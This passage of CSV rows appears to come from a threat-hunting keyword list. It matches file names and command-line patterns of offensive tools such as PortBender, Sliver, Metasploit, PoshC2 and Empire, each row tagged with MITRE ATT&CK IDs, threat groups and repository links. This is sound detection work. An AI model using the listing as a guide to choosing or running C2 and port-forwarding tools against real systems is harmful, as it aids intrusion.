+"*poor buffer accounting in str_netfd_alloc*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
+"*pornhub.py*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - 
T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z"
+"*port and pasv both active*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
+"*port_forward_pivot.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"*port_scanner_ip_obj.py*","offensive_tool_keyword","red-python-scripts","random 
networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z"
+"*port_scanner_regex.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z"
+"*PortBender backdoor*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z"
+"*PortBender redirect*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect 
inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z"
+"*PortBender.cna*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z"
+"*PortBender.cpp*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z"
+"*portbender.dll*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z"
+"*PortBender.exe*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z"
+"*PortBender.h*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z"
+"*PortBender.sln*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z"
+"*PortBender.zip*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z"
+"*portfwd add ?l *-p *-r *","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Port forwarding","10","10","N/A","N/A","N/A","N/A"
+"*portfwd add --bind *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*portfwd add -r *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*portscan*","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Information Gathering","https://github.com/zs5460/portscan","1","0","N/A","N/A","1","13","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z"
+"*portscan.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*portscan_result.cna*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z"
+"*portscan386 *","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*portscan64 *","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*PortScan-Alive*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - 
TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*portscanner.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*portscanner.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
+"*Portscan-Port*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*portScanWithService.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*portScanWithService.py*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*portswigger.net*","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*portswigger.net*","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. 
This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*posh_in_mem*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*posh_stageless.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*Posh_v4_dropper_*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - 
T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Posh_v4_x64_*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Posh_v4_x86_*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and 